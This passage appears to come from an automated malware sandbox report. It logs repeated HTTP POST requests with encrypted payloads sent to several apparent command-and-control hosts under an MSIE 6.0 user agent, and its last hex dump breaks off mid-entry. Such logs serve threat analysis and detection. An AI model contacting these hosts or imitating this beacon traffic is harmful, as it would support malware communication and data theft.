                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 6d 44 75 2f 44 2f 36 6f 6a 41 6b 64 53 54 4c 32 79 62 79 32 52 4f 45 43 64 2b 75 2b 56 72 4f 78 45 70 6b 77 7a 69 52 69 54 47 35 41 49 75 45 4a 31 41 48 52 6d 55 52 50 4c 42 42 52 45 4b 58 55 67 6d 61 65 6c 70 77 79 71 76 42 35 6d 6b 4f 65 6d 5a 77 34 6f 70 73 33 6b 47 48 6f 39 45 6f 59 2b 4f 66 37 68 59 4b 71 44 45 7a 77 65 34 56 56 49 74 5a 2b 37 6f 34 59 6c 42 57 59 38 51 79 54 31 38 69 79 55 42 68 77 4c 2b 38 38 52 57 76 71 66 65 39 4f 37 56 78 41 35 68 32 47 49 32 31 66 5a 6c 39 73 48 6d 62 58 77 46 35 59 63 41 4b 62 4e 78 4a 4b 75 57 62 66 72 57 7a 39 56 51 39 64 69 59 6d 78 6e 68 4e 72 4a 41 38 7a 59 51 75 42 50 72 42 6e 34 2f 68 30 38 2b 6f 31 2b 38 54 4f 64 79 30 33 6a 4e 4e 7a 69 39 35 77 30 64 5a 44 75 36 33 74 42 4d 73 47 64 69 43 49 4a 66 38 35 38 78 49 63 77 68 56 63 34 47 36 79 70 47 49 4b 45 42 67 69 37 62 75 66 63 78 72 79 6d 53 35 31 64 68 61 5a 53 76 66 55 58 49 6d 31 4a 73 74 49 77 2f 4c 5a 43 58 44 77 46 4b 31 32 63 56 4e 61 37 77 48 59 73 55 4f 44 38 57 37 63 4d 35 31 50 71 65 4e 49 4c 55 57 62 69 42 63 61 76 61 70 39 2b 68 42 41 6c 78 6d 6d 50 4d 4d 4f 58 2b 35 67 61 63 61 33 74 7a 39 4c 78 55 52 61 73 69 69 56 51 57 79 2b 61 48 6a 2f 65 66 62 78 79 72 6f 49 46 69 4f 4f 4e 4e 45 38 4e 77 59 69 69 4a 5a 49 54 58 37 50 57 53 42 65 75 46 56 47 46 4c 6d 42 55 76 6b 41 72 32 57 74 34 64 68 4f 31 75 36 71 78 64 37 47 4d 37 4d 6f 73 6d 70 39 5a 57 2f 71 49 76 37 2f 4a 47 46 56 2b 36 4b 47 4b 68 53 38 71 50 57 4e 38 75 43 71 43 59 6f 43 47 49 76 36 58 4b 7a 46 5a 39 6f 36 35 30 72 51 34 45 49 30 63 6e 36 34 4a 6f 58 4e 6e 41 4f 64 47 76 74 75 72 4c 36 43 46 4d 4c 31 57 51 3d 3d Data Ascii: mDu/D/6ojAkdSTL2yby2ROECd+u+VrOxEpkwziRiTG5AIuEJ1AHRmURPLBBREKXUgmaelpwyqvB5mkOemZw4ops3kGHo9EoY+Of7hYKqDEzwe4VVItZ+7o4YlBWY8QyT18iyUBhwL+88RWvqfe9O7VxA5h2GI21fZl9sHmbXwF5YcAKbNxJKuWbfrWz9VQ9diYmxnhNrJA8zYQuBPrBn4/h08+o1+8TOdy03jNNzi95w0dZDu63tBMsGdiCIJf858xIcwhVc4G6ypGIKEBgi7bufcxrymS51dhaZSvfUXIm1JstIw/LZCXDwFK12cVNa7wHYsUOD8W7cM51PqeNILUWbiBcavap9+hBAlxmmPMMOX+5gaca3tz9LxURasiiVQWy+aHj/efbxyroIFiOONNE8NwYiiJZITX7PWSBeuFVGFLmBUvkAr2Wt4dhO1u6qxd7GM7Mosmp9ZW/qIv7/JGFV+6KGKhS8qPWN8uCqCYoCGIv6XKzFZ9o650rQ4EI0cn64JoXNnAOdGvturL6CFML1WQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheData Raw: 75 5a 7a 67 42 72 72 2f 6e 41 6e 33 6f 6f 4c 67 58 51 74 32 51 50 33 51 69 37 49 71 65 6a 57 65 6a 71 57 52 4d 4a 75 44 47 4c 2b 50 59 78 38 69 77 71 7a 57 64 44 68 55 4e 31 41 78 32 2f 49 75 43 38 43 37 59 77 4a 42 47 44 61 52 73 79 46 41 57 36 66 42 74 5a 56 53 36 37 33 42 7a 2b 49 76 6f 6f 6d 2f 4a 59 4c 66 6b 43 68 65 6d 69 52 32 65 48 4a 6e 65 2f 39 4e 5a 2b 62 32 45 4c 4b 55 75 49 30 69 36 68 70 76 6d 43 4f 77 63 4e 78 65 51 79 68 58 61 66 4c 57 4d 6e 72 44 64 75 6b 4c 43 5a 6f 6e 6b 65 4c 42 65 6c 73 36 77 6a 7a 4a 68 51 59 30 6d 42 41 45 59 55 6c 32 4e 74 72 44 58 37 6f 6f 76 62 33 32 2b 76 34 64 30 35 66 46 33 47 52 43 54 75 75 53 54 70 69 4b 74 62 71 42 38 51 33 7a 6e 46 42 6f 6f 4e 63 62 66 36 2f 57 67 54 57 54 50 47 50 6b 6f 39 53 6e 70 71 6f 51 38 65 45 68 76 45 4b 77 6d 6c 50 75 46 42 35 76 32 31 45 64 6b 73 5a 61 65 48 44 33 67 41 58 62 46 73 51 48 6d 76 44 73 33 59 35 39 43 6c 79 70 2f 56 73 35 39 35 39 71 6e 4e 6c 58 76 36 69 32 6c 67 51 30 62 4d 55 56 72 63 31 33 30 50 37 69 2b 59 55 38 64 4b 33 74 76 2f 69 6e 41 4e 78 6d 6d 4b 43 41 73 53 35 50 36 61 2f 4f 73 64 32 30 76 32 72 4e 2f 30 77 4f 71 34 58 31 47 4f 71 59 45 61 6f 32 4a 70 72 48 74 5a 64 71 50 6a 62 64 47 59 59 71 56 53 41 4d 48 4f 75 48 76 6a 4b 63 76 46 62 52 45 44 46 4e 71 53 6a 36 52 72 59 46 74 39 58 78 75 70 6d 2f 54 78 6b 6f 4d 48 34 49 55 6b 6f 50 67 4d 43 70 2f 70 35 4a 4b 79 77 77 33 68 46 52 63 79 74 64 33 69 34 57 4d 64 62 33 6c 65 46 66 46 6d 69 64 55 76 69 66 53 36 32 6b 32 6d 71 4b 31 71 34 51 4b 34 6c 62 72 68 4e 79 6a 68 4b 38 37 75 58 4c 6c 4d 79 47 2f 32 71 62 57 4b 36 49 78 38 71 5a 4f 6f 2f 7a 44 66 6e 61 6d 32 6d 48 36 6d 4c 54 49 53 39 46 73 4e 32 6d 45 79 74 71 68 4d 43 4a 6f 2f 71 50 31 56 53 64 64 36 73 3d Data Ascii: uZzgBrr/nAn3ooLgXQt2QP3Qi7IqejWejqWRMJuDGL+PYx8iwqzWdDhUN1Ax2/IuC8C7YwJBGDaRsyFAW6fBtZVS673Bz+Ivoom/JYLfkChemiR2eHJne/9NZ+b2ELKUuI0i6hpvmCOwcNxeQyhXafLWMnrDdukLCZonkeLBels6wjzJhQY0mBAEYUl2NtrDX7oovb32+v4d05fF3GRCTuuSTpiKtbqB8Q3znFBooNcbf6/WgTWTPGPko9SnpqoQ8eEhvEKwmlPuFB5v21EdksZaeHD3gAXbFsQHmvDs3Y59Clyp/Vs5959qnNlXv6i2lgQ0bMUVrc130P7i+YU8dK3tv/inANxmmKCAsS5P6a/Osd20v2rN/0wOq4X1GOqYEao2JprHtZdqPjbdGYYqVSAMHOuHvjKcvFbREDFNqSj6RrYFt9Xxupm/TxkoMH4IUkoPgMCp/p5JKyww3hFRcytd3i4WMdb3leFfFmidUvifS62k2mqK1q4QK4lbrhNyjhK87uXLlMyG/2qbWK6Ix8qZOo/zDfnam2mH6mLTIS9FsN2mEytqhMCJo/qP1VSdd6s=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 4c 47 4a 49 4c 41 56 47 68 51 6d 54 45 6a 4a 69 4c 48 2b 57 71 48 34 73 6a 54 6e 54 67 59 66 7a 43 64 73 42 6c 2f 59 71 54 73 63 63 5a 33 4a 34 74 35 63 2b 69 6d 6d 65 5a 77 59 63 4c 4a 70 2b 73 4c 55 52 79 39 6f 67 36 46 38 4c 64 66 39 42 36 63 33 70 2f 4b 4e 79 34 4c 31 57 2f 6d 63 73 32 67 45 59 6c 31 38 54 33 6f 75 64 74 6b 34 47 32 42 39 48 6c 2f 66 6e 64 61 71 47 5a 42 30 53 79 42 57 53 6b 58 59 4a 79 75 68 75 66 79 6c 6d 31 76 69 53 53 34 34 6f 71 51 51 2f 38 35 32 52 6b 78 6a 36 54 4a 59 61 51 55 32 30 6f 70 6e 36 6b 78 70 37 38 57 55 73 35 68 4d 2b 55 72 73 32 73 50 71 30 64 4f 64 49 59 46 6a 4a 72 4e 33 79 6a 52 45 37 46 5a 32 6c 6c 6a 54 39 78 6a 63 63 41 7a 48 74 4a 6d 39 37 79 70 51 71 64 44 6d 4b 43 36 32 75 45 6a 70 56 68 70 47 38 36 4f 39 2b 35 48 54 52 57 44 62 4b 42 46 67 48 65 42 65 6a 35 45 7a 67 37 50 79 74 76 57 4c 50 4a 4e 2f 5a 66 6b 65 72 2b 66 66 4a 6a 62 76 36 5a 59 4d 4f 4b 79 56 33 65 6f 75 31 61 32 66 47 55 55 69 61 53 62 66 62 36 33 64 78 39 65 50 61 77 2b 6b 57 6a 52 35 51 46 33 68 50 6c 58 74 6b 41 55 43 78 42 63 49 52 48 6f 58 31 44 79 74 36 4a 56 73 4a 74 4c 79 57 38 7a 59 46 47 50 6a 4a 6e 4e 59 79 36 6b 71 75 66 71 54 58 7a 32 39 4e 51 32 6c 30 4b 62 79 77 52 44 6b 47 74 6e 6c 6f 75 43 4d 6b 73 66 46 36 69 4e 44 74 72 51 56 65 63 4d 72 32 4c 78 4a 39 73 45 6d 66 70 6d 6a 75 67 54 39 2f 58 52 51 37 2f 76 73 39 6c 76 36 78 52 77 6b 75 69 52 77 45 4e 61 70 71 2b 6c 7a 30 47 53 4a 71 71 52 4f 68 50 77 6a 49 31 72 78 37 4f 48 6c 65 39 46 71 77 6b 52 5a 50 76 57 65 54 48 71 2f 58 48 38 48 68 38 6c 5a 68 37 39 6c 74 71 70 57 54 77 57 73 52 57 42 48 6e 64 72 51 35 6f 34 6b 3d Data Ascii: LGJILAVGhQmTEjJiLH+WqH4sjTnTgYfzCdsBl/YqTsccZ3J4t5c+immeZwYcLJp+sLURy9og6F8Ldf9B6c3p/KNy4L1W/mcs2gEYl18T3oudtk4G2B9Hl/fndaqGZB0SyBWSkXYJyuhufylm1viSS44oqQQ/852Rkxj6TJYaQU20opn6kxp78WUs5hM+Urs2sPq0dOdIYFjJrN3yjRE7FZ2lljT9xjccAzHtJm97ypQqdDmKC62uEjpVhpG86O9+5HTRWDbKBFgHeBej5Ezg7PytvWLPJN/Zfker+ffJjbv6ZYMOKyV3eou1a2fGUUiaSbfb63dx9ePaw+kWjR5QF3hPlXtkAUCxBcIRHoX1Dyt6JVsJtLyW8zYFGPjJnNYy6kqufqTXz29NQ2l0KbywRDkGtnlouCMksfF6iNDtrQVecMr2LxJ9sEmfpmjugT9/XRQ7/vs9lv6xRwkuiRwENapq+lz0GSJqqROhPwjI1rx7OHle9FqwkRZPvWeTHq/XH8Hh8lZh79ltqpWTwWsRWBHndrQ5o4k=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 75 79 73 47 63 72 37 4b 71 41 6e 5a 71 2b 41 78 69 66 4e 57 78 36 46 4b 4b 72 78 2b 43 79 53 37 30 6a 35 54 39 47 49 6e 57 72 43 32 47 53 6e 43 6f 2f 57 6e 54 42 59 30 32 78 6a 51 6f 54 35 33 66 44 30 71 41 4b 41 64 73 57 4f 37 56 4c 32 57 64 50 47 45 74 76 52 69 57 39 4a 46 6f 68 62 4f 31 37 46 6a 76 73 66 6d 54 75 52 51 54 39 2b 5a 53 35 6d 44 4d 68 43 44 64 5a 45 57 72 4c 78 43 66 54 7a 4f 49 78 38 69 6b 6c 48 68 32 4f 74 41 4c 54 37 41 78 34 43 6c 64 72 42 62 4c 62 35 6d 37 2f 56 58 42 43 48 48 4b 48 54 75 35 73 56 4f 75 45 4a 4c 68 79 4e 6a 54 4a 62 4d 77 44 33 2b 31 69 31 36 37 4b 38 4f 34 6e 75 59 2f 64 43 72 4f 42 50 4c 64 4c 59 64 66 51 43 6b 63 6e 42 4d 6c 68 33 78 33 39 4e 36 76 55 6b 70 50 49 62 4c 42 2f 52 44 56 45 45 54 67 79 55 33 70 64 6f 63 76 45 68 35 66 72 6b 32 56 79 75 67 56 5a 61 36 50 6e 58 55 49 34 6f 68 34 51 78 32 6e 63 56 56 39 46 57 48 5a 49 55 43 4e 6e 34 74 56 74 6e 4f 33 4e 6f 31 43 30 74 6b 4e 57 2f 63 49 64 63 33 38 30 54 6a 35 4e 36 71 6f 74 71 56 42 42 46 6f 73 49 67 68 6c 79 54 4f 73 70 55 6d 55 4a 79 58 66 36 53 75 6c 69 79 43 74 50 6f 72 42 65 74 2f 68 67 72 38 6c 6c 73 55 65 5a 34 67 54 55 39 6b 39 45 4a 44 51 48 46 71 7a 42 6b 37 44 66 48 37 30 69 59 66 33 78 4b 54 57 45 69 72 69 65 74 75 72 64 54 45 6f 6f 4c 79 4c 51 66 6f 33 63 32 36 50 6d 6d 76 4b 45 6a 78 2f 33 6b 74 6d 4c 6e 68 51 39 6e 62 66 47 4e 39 74 49 6f 32 71 51 47 2b 6f 76 43 50 54 52 66 66 6b 68 31 6d 76 59 5a 41 42 34 33 38 2f 4a 39 6d 41 35 51 4d 72 67 39 6c 2f 38 47 55 4e 49 62 72 70 57 43 53 4c 61 2b 74 37 45 6b 47 6c 4d 4a 77 6d 39 4a 53 30 63 6f 6f 54 73 67 77 61 5a 57 50 41 61 61 6e 66 33 61 39 65 51 3d 3d Data Ascii: uysGcr7KqAnZq+AxifNWx6FKKrx+CyS70j5T9GInWrC2GSnCo/WnTBY02xjQoT53fD0qAKAdsWO7VL2WdPGEtvRiW9JFohbO17FjvsfmTuRQT9+ZS5mDMhCDdZEWrLxCfTzOIx8iklHh2OtALT7Ax4CldrBbLb5m7/VXBCHHKHTu5sVOuEJLhyNjTJbMwD3+1i167K8O4nuY/dCrOBPLdLYdfQCkcnBMlh3x39N6vUkpPIbLB/RDVEETgyU3pdocvEh5frk2VyugVZa6PnXUI4oh4Qx2ncVV9FWHZIUCNn4tVtnO3No1C0tkNW/cIdc380Tj5N6qotqVBBFosIghlyTOspUmUJyXf6SuliyCtPorBet/hgr8llsUeZ4gTU9k9EJDQHFqzBk7DfH70iYf3xKTWEirieturdTEooLyLQfo3c26PmmvKEjx/3ktmLnhQ9nbfGN9tIo2qQG+ovCPTRffkh1mvYZAB438/J9mA5QMrg9l/8GUNIbrpWCSLa+t7EkGlMJwm9JS0cooTsgwaZWPAaanf3a9eQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 56 75 6b 62 4b 7a 6b 38 68 51 6e 33 43 4a 63 45 79 4c 6a 43 72 39 4a 6b 59 62 30 58 56 76 53 7a 66 58 71 34 77 4c 39 39 42 6f 41 5a 79 62 74 69 6e 50 46 42 73 72 78 5a 79 57 6b 35 55 52 6f 46 50 69 79 70 49 77 35 4c 2f 38 43 74 30 56 70 5a 62 69 59 55 49 53 39 45 51 5a 79 48 54 43 6e 33 70 7a 51 62 39 42 54 70 43 48 6b 6e 70 53 51 64 6a 59 55 59 33 6b 48 78 68 52 72 30 39 74 64 63 45 75 76 33 45 72 52 79 36 4e 43 49 77 4f 33 55 4e 75 73 65 6e 53 74 50 64 58 79 4d 77 4b 6d 42 55 59 4c 34 6b 71 49 4e 46 46 5a 35 70 59 62 2b 4a 2f 6d 46 2f 46 70 70 5a 49 50 56 33 72 61 59 59 71 62 36 51 62 46 2b 6e 49 45 68 54 42 36 4a 56 65 73 4e 47 47 66 39 59 78 45 32 47 5a 7a 6f 68 43 70 47 77 4e 64 46 50 6f 45 6b 45 36 4b 72 46 64 39 65 6c 33 54 73 36 7a 47 6a 6c 5a 64 49 4a 4a 44 63 45 48 79 34 5a 39 31 49 47 53 4b 35 77 46 41 49 6c 68 30 57 77 71 45 41 65 53 55 44 6a 45 49 67 52 76 6a 43 4b 71 44 38 33 49 4a 48 4d 2b 68 39 6c 6e 63 47 6b 45 6b 38 68 74 44 4a 63 4e 51 4b 2f 37 6c 50 69 42 52 35 66 63 63 74 48 32 50 50 37 2b 65 44 2b 6c 49 36 37 36 2f 66 64 71 6e 51 6b 56 56 67 71 48 2b 37 2f 6b 56 37 6b 67 77 41 75 4f 45 43 52 30 74 59 42 50 79 42 75 42 67 6d 43 59 35 38 47 6c 72 44 53 31 66 53 43 35 47 39 33 37 4d 79 50 55 50 36 75 46 78 48 68 54 38 74 59 49 47 74 58 48 63 4d 68 37 6d 6c 6f 31 6d 72 4b 72 4e 57 4d 4f 4b 2b 4f 71 6c 49 4e 50 7a 56 39 4b 33 72 48 7a 66 58 73 4c 38 70 54 4e 53 76 4a 74 58 35 5a 75 56 58 69 73 38 6d 55 37 46 43 4d 7a 6b 5a 71 45 66 53 77 4d 67 63 6f 6d 4f 69 57 6e 54 46 49 4f 48 4e 46 46 57 54 6e 55 58 74 38 57 37 59 34 73 63 45 51 70 77 67 6c 33 72 36 71 67 6d 4f 6e 6a 44 55 30 74 39 79 4c 6a 63 71 47 70 4b 78 35 57 4c 78 44 62 4e 69 42 32 67 6d 58 47 46 63 38 63 55 3d Data Ascii: VukbKzk8hQn3CJcEyLjCr9JkYb0XVvSzfXq4wL99BoAZybtinPFBsrxZyWk5URoFPiypIw5L/8Ct0VpZbiYUIS9EQZyHTCn3pzQb9BTpCHknpSQdjYUY3kHxhRr09tdcEuv3ErRy6NCIwO3UNusenStPdXyMwKmBUYL4kqINFFZ5pYb+J/mF/FppZIPV3raYYqb6QbF+nIEhTB6JVesNGGf9YxE2GZzohCpGwNdFPoEkE6KrFd9el3Ts6zGjlZdIJJDcEHy4Z91IGSK5wFAIlh0WwqEAeSUDjEIgRvjCKqD83IJHM+h9lncGkEk8htDJcNQK/7lPiBR5fcctH2PP7+eD+lI676/fdqnQkVVgqH+7/kV7kgwAuOECR0tYBPyBuBgmCY58GlrDS1fSC5G937MyPUP6uFxHhT8tYIGtXHcMh7mlo1mrKrNWMOK+OqlINPzV9K3rHzfXsL8pTNSvJtX5ZuVXis8mU7FCMzkZqEfSwMgcomOiWnTFIOHNFFWTnUXt8W7Y4scEQpwgl3r6qgmOnjDU0t9yLjcqGpKx5WLxDbNiB2gmXGFc8cU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 76 31 62 56 42 59 61 58 72 51 6e 6b 57 65 72 46 6f 51 6d 31 73 4b 6c 61 72 54 7a 6d 43 2f 63 4b 47 72 52 63 48 6b 7a 46 42 54 7a 47 41 4a 79 4a 4a 42 55 6d 58 73 32 6d 34 4f 70 52 6f 51 2b 6d 7a 35 70 41 5a 76 45 44 39 34 2b 4e 31 31 33 54 51 72 6a 4c 76 65 30 46 63 38 44 31 77 79 6a 39 74 37 71 35 51 49 59 4b 55 77 63 43 73 75 71 74 6e 64 2b 55 59 34 4a 5a 70 33 36 79 38 58 7a 71 30 71 72 73 67 42 5a 63 43 48 68 78 72 6c 36 43 4a 54 66 36 6b 52 5a 4a 7a 50 78 39 43 66 6f 66 72 38 41 4c 6d 67 6e 6b 53 4e 47 35 4e 4c 6e 57 4a 6b 62 71 68 6f 2b 37 56 48 48 2f 36 62 49 74 42 70 53 47 70 44 57 73 46 52 6b 31 52 47 62 2b 78 4a 69 65 64 63 74 51 59 71 73 31 65 36 72 44 42 53 48 66 5a 6f 30 4d 6b 33 36 4d 4a 71 4f 44 51 73 39 30 53 56 41 77 35 57 67 6c 33 71 37 6c 35 30 42 45 4b 4f 76 6b 51 45 2b 42 54 39 37 79 44 66 4f 5a 4c 70 32 44 50 58 33 6e 33 6f 6c 4a 34 62 57 76 33 36 6b 65 59 30 32 66 55 49 69 48 4c 71 69 42 78 79 46 66 5a 79 47 61 42 2b 38 34 75 50 46 33 67 50 62 6b 36 44 61 32 4e 6e 53 38 50 5a 69 5a 54 35 52 6c 76 48 77 50 63 56 62 6c 61 63 4e 62 61 52 69 46 2b 7a 52 32 43 2b 47 43 43 59 6b 4a 61 4b 47 54 54 57 76 6b 5a 6b 32 4c 2b 4f 2b 74 72 7a 38 31 43 36 79 31 7a 2b 43 35 42 4d 46 7a 71 37 2f 76 30 52 38 48 56 62 79 36 57 7a 75 6b 41 35 43 6d 6b 4a 4f 6d 4d 32 70 33 4e 64 6a 53 45 65 46 62 76 31 39 44 65 4a 6a 73 76 66 2b 33 67 4b 55 59 50 53 30 74 2f 67 33 53 68 30 79 68 63 59 77 44 38 32 4e 4f 4f 58 79 64 48 77 44 47 2b 70 57 50 53 72 79 6b 67 66 2b 32 74 47 6d 2f 57 77 38 6e 4e 30 70 49 36 44 66 71 31 62 5a 69 46 74 6c 37 33 61 51 67 39 42 4b 6e 66 61 7a 5a 72 59 36 39 30 70 52 31 61 57 33 37 50 51 38 6f 46 72 69 2b 2f 71 56 31 38 34 5a 42 75 4a 53 61 53 51 66 68 6d 39 39 41 54 51 55 74 74 6b 46 43 33 55 57 67 50 48 6f 61 56 73 52 53 48 49 45 52 43 36 51 6e 78 77 3d 3d Data Ascii: v1bVBYaXrQnkWerFoQm1sKlarTzmC/cKGrRcHkzFBTzGAJyJJBUmXs2m4OpRoQ+mz5pAZvED94+N113TQrjLve0Fc8D1wyj9t7q5QIYKUwcCsuqtnd+UY4JZp36y8Xzq0qrsgBZcCHhxrl6CJTf6kRZJzPx9Cfofr8ALmgnkSNG5NLnWJkbqho+7VHH/6bItBpSGpDWsFRk1RGb+xJiedctQYqs1e6rDBSHfZo0Mk36MJqODQs90SVAw5Wgl3q7l50BEKOvkQE+BT97yDfOZLp2DPX3n3olJ4bWv36keY02fUIiHLqiBxyFfZyGaB+84uPF3gPbk6Da2NnS8PZiZT5RlvHwPcVblacNbaRiF+zR2C+GCCYkJaKGTTWvkZk2L+O+trz81C6y1z+C5BMFzq7/v0R8HVby6WzukA5CmkJOmM2p3NdjSEeFbv19DeJjsvf+3gKUYPS0t/g3Sh0yhcYwD82NOOXydHwDG+pWPSrykgf+2tGm/Ww8nN0pI6Dfq1bZiFtl73aQg9BKnfazZrY690pR1aW37PQ8oFri+/qV184ZBuJSaSQfhm99ATQUttkFC3UWgPHoaVsRSHIERC6Qnxw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 37 4f 61 51 36 32 38 4e 74 51 6b 6d 33 64 64 74 6a 74 7a 52 4c 58 6a 70 38 61 6d 46 64 6c 74 41 45 37 77 63 79 6b 63 49 73 6c 50 50 5a 6e 76 38 48 55 65 68 55 71 37 56 52 64 68 64 73 48 36 76 55 51 39 56 30 35 67 44 69 44 31 45 66 52 35 50 2b 7a 48 6d 46 64 75 42 42 36 38 41 68 50 5a 57 77 36 53 4b 56 46 59 39 71 75 36 47 47 6d 7a 58 48 47 33 66 64 58 34 36 56 67 49 65 6d 6e 54 77 2b 55 46 63 62 4e 46 72 39 78 68 53 38 53 45 63 65 72 43 38 67 4c 30 64 2b 59 30 6a 39 77 39 49 68 6a 59 6d 42 49 52 6a 6c 77 4a 4b 69 65 63 64 5a 73 35 44 46 79 74 74 5a 39 6a 4f 43 61 58 36 50 33 4e 6f 71 32 77 59 41 4d 6c 72 56 75 4b 50 72 46 30 5a 70 78 33 66 32 4a 4b 77 58 33 63 6e 61 37 4c 77 69 66 2b 72 30 36 63 46 38 69 58 4c 63 4b 4c 6d 35 6d 48 4f 62 49 4d 38 66 63 50 6e 6d 79 78 4e 72 79 57 69 79 69 39 4f 78 78 76 6f 2f 6a 47 61 4c 76 69 72 50 31 34 77 4a 71 70 79 61 6b 43 42 6c 70 75 4e 7a 54 6c 57 75 4d 36 41 78 64 38 6a 49 6a 45 5a 49 43 4f 45 76 62 66 30 6e 51 36 59 56 6c 52 62 41 44 53 52 49 54 4b 6a 69 48 32 46 6c 48 6d 4e 42 44 48 79 31 58 67 79 37 75 70 61 41 79 75 66 65 36 4c 37 6c 65 7a 78 67 73 69 6f 37 41 4b 32 61 34 33 54 6a 70 55 44 62 66 6a 51 4b 33 45 57 79 47 55 62 48 4e 4f 2f 52 37 53 6e 61 52 51 6a 34 48 30 75 73 42 65 59 55 4a 70 73 5a 54 70 73 79 55 66 35 30 50 57 4f 4e 57 61 65 58 58 75 62 77 6d 4d 74 55 37 6a 6d 69 50 41 49 55 2f 74 2b 38 57 61 4c 6f 79 54 6d 67 4b 31 30 59 4c 75 38 50 77 77 4f 48 32 69 66 52 34 73 53 58 33 5a 6b 2f 36 47 65 71 7a 69 6d 4c 78 51 78 44 4c 4b 4a 53 45 59 5a 67 45 4c 4d 56 55 36 65 67 42 72 58 38 55 63 37 54 6f 68 2b 4a 72 71 63 37 62 49 6b 5a 51 58 58 51 77 3d 3d Data Ascii: 7OaQ628NtQkm3ddtjtzRLXjp8amFdltAE7wcykcIslPPZnv8HUehUq7VRdhdsH6vUQ9V05gDiD1EfR5P+zHmFduBB68AhPZWw6SKVFY9qu6GGmzXHG3fdX46VgIemnTw+UFcbNFr9xhS8SEcerC8gL0d+Y0j9w9IhjYmBIRjlwJKiecdZs5DFyttZ9jOCaX6P3Noq2wYAMlrVuKPrF0Zpx3f2JKwX3cna7Lwif+r06cF8iXLcKLm5mHObIM8fcPnmyxNryWiyi9Oxxvo/jGaLvirP14wJqpyakCBlpuNzTlWuM6Axd8jIjEZICOEvbf0nQ6YVlRbADSRITKjiH2FlHmNBDHy1Xgy7upaAyufe6L7lezxgsio7AK2a43TjpUDbfjQK3EWyGUbHNO/R7SnaRQj4H0usBeYUJpsZTpsyUf50PWONWaeXXubwmMtU7jmiPAIU/t+8WaLoyTmgK10YLu8PwwOH2ifR4sSX3Zk/6GeqzimLxQxDLKJSEYZgELMVU6egBrX8Uc7Toh+Jrqc7bIkZQXXQw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 56 75 6b 62 4b 7a 6b 38 68 51 6e 33 43 4a 63 45 79 4c 6a 43 72 39 4a 6b 59 62 30 58 56 76 53 7a 66 58 71 34 77 4c 39 39 42 6f 41 5a 79 62 74 69 6e 50 46 42 73 72 78 5a 79 57 6b 35 55 52 6f 46 50 69 79 70 49 77 35 4c 2f 38 43 74 30 56 70 5a 62 69 59 55 49 53 39 45 51 5a 79 48 54 43 6e 33 70 7a 51 62 39 42 54 70 43 48 6b 6e 70 53 51 64 6a 59 55 59 33 6b 48 78 68 52 72 30 39 74 64 63 45 75 76 33 45 72 52 79 36 4e 43 49 77 4f 33 55 4e 75 73 65 6e 53 74 50 64 58 79 4d 77 4b 6d 42 55 59 4c 34 6b 71 49 4e 46 46 5a 35 70 59 62 2b 4a 2f 6d 46 2f 46 70 70 5a 49 50 56 33 72 61 59 59 71 62 36 51 62 46 2b 6e 49 45 68 54 42 36 4a 56 65 73 4e 47 47 66 39 59 78 45 32 47 5a 7a 6f 68 43 70 47 77 4e 64 46 50 6f 45 6b 45 36 4b 72 46 64 39 65 6c 33 54 73 36 7a 47 6a 6c 5a 64 49 4a 4a 44 63 45 48 79 34 5a 39 31 49 47 53 4b 35 77 46 41 49 6c 68 30 57 77 71 45 41 65 53 55 44 6a 45 49 67 52 76 6a 43 4b 71 44 38 33 49 4a 48 4d 2b 68 39 6c 6e 63 47 6b 45 6b 38 68 74 44 4a 63 4e 51 4b 2f 37 6c 50 69 42 52 35 66 63 63 74 48 32 50 50 37 2b 65 44 2b 6c 49 36 37 36 2f 66 64 71 6e 51 6b 56 56 67 71 48 2b 37 2f 6b 56 37 6b 67 77 41 75 4f 45 43 52 30 74 59 42 50 79 42 75 42 67 6d 43 59 35 38 47 6c 72 44 53 31 66 53 43 35 47 39 33 37 4d 79 50 55 50 36 75 46 78 48 68 54 38 74 59 49 47 74 58 48 63 4d 68 37 6d 6c 6f 31 6d 72 4b 72 4e 57 4d 4f 4b 2b 4f 71 6c 49 4e 50 7a 56 39 4b 33 72 48 7a 66 58 73 4c 38 70 54 4e 53 76 4a 74 58 35 5a 75 56 58 69 73 38 6d 55 37 46 43 4d 7a 6b 5a 71 45 66 53 77 4d 67 63 6f 6d 4f 69 57 6e 54 46 49 4f 48 4e 46 46 57 54 6e 55 58 74 38 57 37 59 34 73 63 45 51 70 77 67 6c 33 72 36 71 67 6d 4f 6e 6a 44 55 30 74 39 79 4c 6a 63 71 47 70 4b 78 35 57 4c 78 44 62 4e 69 42 32 67 